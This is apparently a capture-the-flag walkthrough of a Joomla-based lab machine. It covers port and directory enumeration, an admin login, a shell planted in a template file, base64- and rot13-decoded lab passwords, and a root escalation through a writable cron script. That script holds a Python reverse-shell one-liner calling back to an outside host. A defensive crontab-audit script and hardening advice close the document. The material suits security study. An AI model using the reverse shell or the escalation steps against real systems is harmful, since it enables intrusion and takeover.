System IP: 192.168.1.56

### Summary

- **1- Overview**
- **2- Port Enumeration**
  - 2.1- Service Enumeration
  - 2.2- Web Server Enumeration
- **3- Establish a foothold**
- **4- Privilege Escalation**
  - to rob
  - to Abner
  - to penguin
  - to root

## 1- Overview

## 2- Port Enumeration

### 2.1- Service Enumeration

**Using nmapAutomator for scanning:**

```
/mnt/nmapAutomator/nmapAutomator.sh -o ./ -t all 192.168.1.56
```

**The nmap results are as follows:**

```
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:78:43:07 (VMware)
```

**Using rustscan for scanning:**

```
rustscan -u 5000 -- -A -a ip
```

**The rustscan results are as follows:**

```
```

### 2.2- Web Server Enumeration

#### nikto

```
```

#### gobuster

```
gobuster dir -u http://192.168.1.56/joomla/ -w /usr/share/SecLists/Discovery/Web-Content/common.txt -k -x php,txt -r -e
```

Results:

```
http://192.168.1.56/joomla/LICENSE.txt    (Status: 200) [Size: 18092]
http://192.168.1.56/joomla/README.txt     (Status: 200) [Size: 4874]
http://192.168.1.56/joomla/administrator  (Status: 200) [Size: 4923]
http://192.168.1.56/joomla/index.php      (Status: 200) [Size: 10007]
http://192.168.1.56/joomla/index.php      (Status: 200) [Size: 10007]
http://192.168.1.56/joomla/robots.txt     (Status: 200) [Size: 836]
http://192.168.1.56/joomla/robots.txt     (Status: 200) [Size: 836]
http://192.168.1.56/joomla/web.config.txt (Status: 200) [Size: 1690]
```

### Userlist

```
http://192.168.124.65//how_to.txt
Rob
```

### Information gathered

```
http://192.168.124.65/joomla/README.txt
Joomla! 3.7 version
```

## 3- Establish a foothold

Build a wordlist from the site with cewl:

```
cewl http://192.168.124.65/joomla -m 5 --with-numbers > html_80.dict
```

Joomla credentials found:

```
joomla : Gotham
```

Log in to the admin panel and upload a shell by editing the template file error.php:

```
http://192.168.124.65/joomla/templates/beez3/error.php
```

![[Pasted image 20220326170136.png]]
![[Pasted image 20220326170318.png]]

## 4- Privilege Escalation

### to rob

From configuration.php:

```
mysql -> joomla : babyjoker
```

```sql
show databases;
use batjoke;
select * from taskforce;
```

```
1 | Soldier | 2020-06-14 | Bane    | YmFuZWlzaGVyZQ==                              -> baneishere
2 | Soldier | 2020-06-14 | Aaron   | YWFyb25pc2hlcmU=                              -> aaronishere
3 | Soldier | 2020-06-14 | Carnage | Y2FybmFnZWlzaGVyZQ==                          -> carnageishere
4 | Soldier | 2020-06-14 | buster  | YnVzdGVyaXNoZXJlZmY=                          -> busterishereff
6 | Soldier | 2020-06-14 | rob     | Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/  -> ???AllIHaveAreNegativeThoughts???
7 | Soldier | 2020-06-14 | aunt    | YXVudGlzIHRoZSBmdWNrIGhlcmU=                  -> auntis the fuck here
```

So the password is:

```
rob ???AllIHaveAreNegativeThoughts???
```

![[Pasted image 20220326171903.png]]

```
user.txt is : JKR[f5bb11acbb957915e421d62e7253d27a]
```

![[Pasted image 20220326171932.png]]

### to Abner

cat Abnerineedyourhelp and rot13-decrypt it:

```
abner : I33hope99my0death000makes44more8cents00than0my0life0
```

![[Pasted image 20220326172251.png]]
![[Pasted image 20220326172406.png]]

```
user2.txt : JKR{0286c47edc9bfdaf643f5976a8cfbd8d}
```

### to penguin

![[Pasted image 20220326173300.png]]
![[Pasted image 20220326173244.png]]

```
nc -lvvp 12345 > dear.zip                   # on kali
nc 192.168.124.5 12345 < .dear_penguins.zip # on machine
```

zip2john failed, so try Abner's password: `I33hope99my0death000makes44more8cents00than0my0life0`

```
My dear penguins, we stand on a great threshold! It's okay to be scared; many of you won't be coming back. Thanks to Batman, the time has come to punish all of God's children! First, second, third and fourth-born! Why be biased?! Male and female! Hell, the sexes are equal, with their erogenous zones BLOWN SKY-HIGH!!! FORWAAAAAAAAAAAAAARD MARCH!!! THE LIBERATION OF GOTHAM HAS BEGUN!!!!!
scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz
```

```
penguin : scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz
```

![[Pasted image 20220326174856.png]]

```
user3.txt : JKR{284a3753ec11a592ee34098b8cb43d52}
```

### to root

![[Pasted image 20220326175236.png]]

```
Hey Penguin, I'm writing software, I can't make it work because of a permissions issue. It only runs with root permissions. When it's complete I'll copy it to this folder.
Joker
```

I ran pspy64 to check it:

![[Pasted image 20220326175431.png]]
![[Pasted image 20220326175505.png]]

```
cat > .trash_old
content :
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.124.5",12345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
```

```
root.txt : JKR{68028b11a1b7d56c521a90fc18252995}
```

![[Pasted image 20220326180802.png]]
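The root step above works because a root cron job executes a script (.trash_old) that a low-privileged user can write. The audit script below is an added example, not part of the original writeup: it parses /etc/crontab-style lines and, for every root-run entry, reports targets that are missing, writable by group/other, or sitting in a non-sticky directory writable by group/other. The crontab text and the files it checks are constructed in a temporary directory; it assumes a POSIX filesystem. Run it as root against the real /etc/crontab and /etc/cron.d/* to find this kind of misconfiguration during a hardening review.

```python
"""Audit /etc/crontab-style entries for root-run scripts that other users can modify.

Added example (not from the original writeup). Assumes a POSIX filesystem; the
crontab text and the files it points at are constructed in a temporary directory.
"""
import os
import stat
import tempfile


def parse_system_crontab(text):
    """Return (user, command_path) pairs from system crontab lines.

    System crontab format: five time fields, a user field, then the command.
    '@reboot'-style lines have one schedule field instead of five.
    Comments, blank lines and VAR=value lines are skipped.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if "=" in fields[0]:            # environment assignment such as PATH=...
            continue
        if fields[0].startswith("@"):   # @reboot / @daily ...
            if len(fields) < 3:
                continue
            user, cmd = fields[1], fields[2]
        else:
            if len(fields) < 7:
                continue
            user, cmd = fields[5], fields[6]
        entries.append((user, cmd))
    return entries


def _writable_by_others(path):
    """True if the path's mode grants write permission to group or other."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def _replaceable_parent(path):
    """True if the containing directory lets group/other create or rename entries (no sticky bit)."""
    parent = os.path.dirname(path) or "."
    mode = os.stat(parent).st_mode
    return _writable_by_others(parent) and not (mode & stat.S_ISVTX)


def audit(entries):
    """Return (command_path, reason) for root-run entries a non-root user could tamper with."""
    findings = []
    for user, cmd in entries:
        if user != "root":
            continue
        if not os.path.isabs(cmd):
            findings.append((cmd, "relative path (resolved via PATH)"))
            continue
        if not os.path.exists(cmd):
            findings.append((cmd, "target does not exist"))
            continue
        if _writable_by_others(cmd):
            findings.append((cmd, "script writable by group/other"))
        elif _replaceable_parent(cmd):
            findings.append((cmd, "parent directory writable by group/other"))
    return findings


def demo():
    """Build a constructed crontab plus two scripts in a temp dir and audit them."""
    root = tempfile.mkdtemp()                 # created 0700, so the parent is not writable by others
    bad = os.path.join(root, ".trash_old")    # mimics the writeup's world-writable cron target
    good = os.path.join(root, "safe.sh")
    for path in (bad, good):
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\nexit 0\n")
    os.chmod(bad, 0o777)   # world-writable: any local user can change what root will run
    os.chmod(good, 0o755)  # others can only read/execute
    crontab = (
        "# constructed /etc/crontab\n"
        "PATH=/usr/local/bin:/usr/bin:/bin\n"
        f"* * * * * root {bad}\n"
        f"*/5 * * * * root {good}\n"
        f"@reboot root {os.path.join(root, 'missing.sh')}\n"
        "0 2 * * * backup /usr/local/bin/rotate-logs\n"   # non-root entry, ignored
    )
    findings = audit(parse_system_crontab(crontab))
    return {os.path.basename(path): reason for path, reason in findings}


if __name__ == "__main__":
    for name, reason in demo().items():
        print(f"{name}: {reason}")
```

The fix on a real host is the usual one: cron targets owned by root with mode 0755 or tighter, in directories that are not group/other-writable, and no root job pointing into a user's home directory. The same checks apply to per-user crontabs and systemd timers.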